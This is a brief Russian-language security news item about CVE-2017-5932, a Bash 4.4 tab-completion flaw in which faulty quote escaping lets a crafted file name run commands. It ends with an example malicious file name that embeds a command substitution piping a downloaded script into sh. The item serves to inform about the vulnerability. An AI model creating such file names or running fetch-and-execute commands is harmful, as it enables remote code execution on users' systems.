Уязвимость в реализации автодополнения ввода в Bash
В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает только ветку Bash 4.4. Исправление пока доступно только в виде патча.
Проблема вызвана ошибкой в коде экранирования спецсимволов, связанной с неверной обработкой кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем, при попытке выполнения операции автодополнения для данного файла будет выполнен определенные злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именемдлинная_строка "`curl ссылка_скрипт|sh`
